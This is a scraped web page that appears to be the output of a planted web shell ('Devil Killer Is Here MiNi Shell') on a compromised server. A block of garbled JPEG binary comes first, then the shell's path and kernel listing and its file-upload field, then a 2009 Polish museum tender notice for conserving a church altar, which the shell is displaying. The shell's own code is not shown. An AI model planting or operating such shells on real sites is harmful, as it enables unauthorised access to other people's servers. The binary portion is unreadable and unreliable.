JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/125222-N-2009.html

<p class="kh_header"><b>Łowicz: Konserwacja wyposażenia kościoła z Wysokienic (skansen w Maurzycach)</b><br>
<b>Numer ogłoszenia: 125222 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum w Łowiczu , Stary Rynek 5/7, 99-400 Łowicz, woj. łódzkie, tel. 046 8373928, faks 046 8373663.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.low.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jesdnostka kultury podległa samorządowi terytorialnemu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja wyposażenia kościoła z Wysokienic (skansen w Maurzycach).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> prace konserwatorskie ołtarza głównego kościoła z Wysokienic (przeniesionego do skansenu w Maurzycach).

Opis stanu technicznego obiektu i zakres prac:
Ołtarz późnobarokowy wielokrotnie konserwowany i przemalowywany. Trójfazowy: na wysokiej mensie. I kondygnacja lekko po łuku wklęsła, część środkowa ujęta dwiema parami złoconych kolumn o bogato złoconych głowicach. Powyżej gzyms profilowany z wysuniętymi przerwanymi łukami, spływy z bogatą dekoracją roślinną wspierają nieboskłon ze srebrnymi obłokami i postacią Boga Ojca w złocistych promieniach na szczycie. Poniżej srebrna Gołębica wyobrażenie Ducha Świętego w otoczeniu chmurek i promieni. Pod nią miejsce po centralnie usytuowanym obrazie w kształcie prostokąta stojącego zakończonego łukiem. Na szczytach gzymsów i spływów siedzi 6 nagich aniołków. Szeroka mensa, której prawe i lewe skrzydło trójścienne zdobione złotym elementem dekoracyjnym stanowią podstawy pod figury Marii i Św. Jana - odlewy gipsowe. Wszystkie krawędzie gzymsów, ścianki boczne spływów, kolumny, dekoracje roślinne i draperie aniołków siedzących na szczytach gzymsów, szata Boga Ojca i promienie są złocone - złocenia wtórne. Tabernakulum powtarza formę ołtarza głównego. Część środkowa wychodzi łukiem do wiernych, centralnie zamknięta jest metalowymi drzwiczkami, złoconymi. Pilasterki, gzymsy, wsporniki, znicze, dekoracyjne zwieńczenia w formie amfor, rozetki i główki aniołków - złocone, draperia - srebrzona. Gama kolorystyczna: jasny róż, pola w zagłębieniach płaszczyzn ciemniejszy róż, złocenie i srebrzenie j.w. Warstwa malarska spękana, odspojona do drewnianego podłoża, w miejscach wykruszeń widoczne warstwy spodnie np. błękit pod nieoryginalnym złotem na gzymsie ślimacznicy lub polerowane oryginalne srebro pod wieloma warstwami przemalowań.


Wymiary ołtarza:
(wysokość, szerokość - cm, powierzchnia w dm2):

	                               wysokość	 szerokość	powierzchnia
gloria z ołtarza głównego	      160,00	101,00	             161,60
Bóg Ojciec z ołtarza głównego     82,00	86,00      	70,52
putto                                      61,00	50,00      	30,50
putto	                                56,00	50,00       	28,00
putto	                                40,00	39,00       	15,60
putto	                                40,00	42,00      	16,80
putto	                                56,00	50,00      	28,00
putto	                                64,00	64,00      	40,96
tabernakulum	                   150,00	137,00    	205,50
ołtarz główny	                   650,00	785,00    	5 102,50

Datowanie: II poł. XVIII w.

Zakres prac konserwatorskich: pełny zakres konserwacji technicznej i estetycznej.
1.Dezynfekcja i dezynsekcja drewna struktury ołtarza, snycerki, tabernakulum i figur.
2 Prace stolarskie i snycerskie (wzmocnienie konstrukcji, uzupełnienie ubytków).
3.Konsolidacja warstw technologicznych na strukturze ołtarza, rzeźbach i snycerce.
4. Usunięcie nawarstwienia kolejnych przemalowań i odzyskanie oryginalnej polichromii i złoceń.
5.Usunięcie powierzchniowych zabrudzeń ze struktury i snycerki.
6.Prace pozłotnicze scalające warstwę malarską z użyciem materiałów szlachetnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 92.52.12.20-7, 92.31.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości : 4.000 pln.
W przypadku złożenia wadium w pieniądzu wadium należy wpłacić na konto:
Bank Spółdzielczy w Skierniewicach Oddział Łowicz
14 9297 0005 0754 1750 2061 0001<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Udział w postępowaniu mogą wziąć wykonawcy, którzy spełniają wymagania określone w ustawie w art. 22 ust. 1 w zw. z art. 24 ust. 1 i 2 oraz w niniejszej specyfikacji tj.:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Ocena spełnienia ww. warunków dokonana zostanie przez komisję przetargową na podstawie złożonych dokumentów lub oświadczeń przez wykonawcę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu wykonawca przedłoży wraz z
ofertą następujące oświadczenia i dokumenty:
1) oświadczenie o spełnieniu warunków udziału w postępowaniu podpisane przez wykonawcę - zał. nr 3 do SIWZ (wzór);
2) jeżeli wykonawca pochodzi z kraju lub ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert dokumenty lub oświadczenia złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo właściwym organem samorządu zawodowego lub gospodarczego wystawione w kraju jego pochodzenia lub, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości;
3) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.
1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu
składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia
albo składania ofert;
4) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.
1 pkt. 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
5) wykaz wykonanych prac konserwatorskich w okresie ostatnich trzech lat przed dniem
wszczęcia postępowania o udzielenie niniejszego zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością pracom konserwatorskim stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączonymi referencjami potwierdzającymi, że prace te zostały wykonane należycie, (zał. nr 4)
6) wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji
zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a
także zakresu wykonywanych przez nie czynności, w tym kopii dyplomu ukończenia
studiów wyższych magisterskich w zakresie konserwacji i restauracji malarstwa i rzeźby
polichromowanej. (zał. nr 5)
7) wykaz narzędzi i urządzeń niezbędnych do wykonania zamówienia, którymi dysponuje
lub będzie dysponował wykonawca (zał. nr 6)
8) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 9, wykonawca wskazał osoby, którymi będzie dysponował (o ile dotyczy),
9) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania
zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 10, wykonawca
wskazał narzędzia i urządzenia, którymi będzie dysponował (o ile dotyczy).
W przypadku podmiotów prowadzących działalność gospodarczą wykonawca przedłoży
dodatkowo:
10) aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
11) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzających, że
wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
12) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy
Rolniczego Ubezpieczenia Społecznego potwierdzających, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - okres gwarancji - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzeum.low.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum w Łowiczu
99 - 400 Łowicz, Stary Rynek 5/7
tel/fax 046 - 837 - 39 - 28, 046 - 837 - 36 - 63..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 12:00, miejsce: Sekretariat Muzeum w Łowiczu
99 - 400 Łowicz, Stary Rynek 5/7
tel/fax 046 - 837 - 39 - 28, 046 - 837 - 36 - 63..</p><p><b>IV.3.5) Termin związania ofertą:</b> do 25.06.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com